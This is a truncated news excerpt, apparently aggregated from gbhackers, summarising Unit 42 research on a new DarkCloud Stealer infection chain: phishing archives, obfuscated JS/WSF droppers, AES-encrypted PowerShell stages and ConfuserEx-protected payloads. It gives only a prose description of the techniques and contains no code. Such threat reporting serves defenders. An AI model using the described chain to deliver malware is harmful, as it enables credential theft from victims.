DarkCloud Stealer Uses Novel Infection Chain and ConfuserEx Obfuscation Techniques
gbhackersUnit 42 researchers have identified a significant evolution in the distribution tactics of DarkCloud Stealer, an infostealer malware first observed shifting its delivery mechanisms in early April 2025.
This update introduces a novel infection chain that incorporates advanced obfuscation via ConfuserEx, culminating in a Visual Basic 6 (VB6) payload designed to thwart static and dynamic analysis.
Obfuscation Strategies
Previously documented attacks relied on AutoIt scripting for evasion, but the latest variants employ multi-layered encryption and protection schemes across three distinct chains, each initiated by phishing emails containing TAR, RAR, or 7Z archives.
These archives deliver obfuscated JavaScript (JS) or Windows Script Files (WSF), which in turn fetch PowerShell (PS1) scripts from open directory servers.

The PS1 scripts, encrypted with Base64 and AES, drop and execute ConfuserEx-protected executables, embedding the final DarkCloud payload.
This chain’s complexity, including javascript-obfuscator for JS files and custom AES ...
Copyright of this story solely belongs to gbhackers . To see the full text click HERE